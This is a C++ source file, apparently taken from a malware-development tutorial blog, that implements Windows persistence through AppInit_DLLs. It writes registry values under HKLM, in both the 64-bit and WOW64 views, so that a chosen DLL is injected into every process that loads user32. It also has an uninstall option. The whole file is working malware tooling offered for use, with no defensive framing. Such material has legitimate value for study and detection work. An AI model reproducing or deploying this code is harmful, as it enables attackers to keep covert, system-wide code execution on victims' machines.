/*
pers.cpp
windows low level persistense via Appinit_DLLs
author: @cocomelonc
edited by: @gamray
https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html
*/

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>


#define warn(msg, ...) printf("[!] - " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] - " msg "\n", ##__VA_ARGS__)
#define done(msg, ...) printf("[+] - " msg "\n", ##__VA_ARGS__)



BOOL file_exists(const char* filename) {
    struct stat   buffer;
    return (stat(filename, &buffer) == 0);
}


int main(int argc, char* argv[]) {

    if (argc < 2) {
        warn("Usage: %s install|uninstall", argv[0]);
        return EXIT_FAILURE;
    }

    const char* action = argv[1];

    if (strcmp(action, "install") != 0 && strcmp(action, "uninstall") != 0) {
        warn("Usage: %s install|uninstall", argv[0]);
        return EXIT_FAILURE;
    }
    
    if (strcmp(action, "install") == 0 && argc != 3) {
        warn("Usage: %s install <path to DLL>", argv[0]);
        return EXIT_FAILURE;
    }

    char* dllPath = "";
    
    if (strcmp(action, "install") == 0) {
        dllPath = argv[2];

        if (!file_exists(dllPath)) {
            warn("File %s does not exist. Exiting.", dllPath);
            return EXIT_FAILURE;
        }

        char dllFullPath[MAX_PATH];
        int success = GetFullPathName(dllPath, MAX_PATH, dllFullPath, NULL);
        if (!success) {
            warn("Error while getting the full path of dll %s. Exiting.", dllPath);
            return EXIT_FAILURE;
        }
        dllPath = dllFullPath;
    }


    HKEY hkey = NULL;
    // activation
    DWORD act = strcmp(action, "install") == 0 ? 1 : 0;

    // 32-bit and 64-bit
    LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey);
    if (res == ERROR_SUCCESS) {
        // create new registry keys
        RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act));
        RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dllPath, strlen(dllPath));
        RegCloseKey(hkey);
    }

    res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0 , KEY_WRITE, &hkey);
    if (res == ERROR_SUCCESS) {
        // create new registry keys
        RegSetValueEx(hkey, (LPCSTR)"LoadAppInit_DLLs", 0, REG_DWORD, (const BYTE*)&act, sizeof(act));
        RegSetValueEx(hkey, (LPCSTR)"AppInit_DLLs", 0, REG_SZ, (unsigned char*)dllPath, strlen(dllPath));
        RegCloseKey(hkey);
    }
    return 0;
}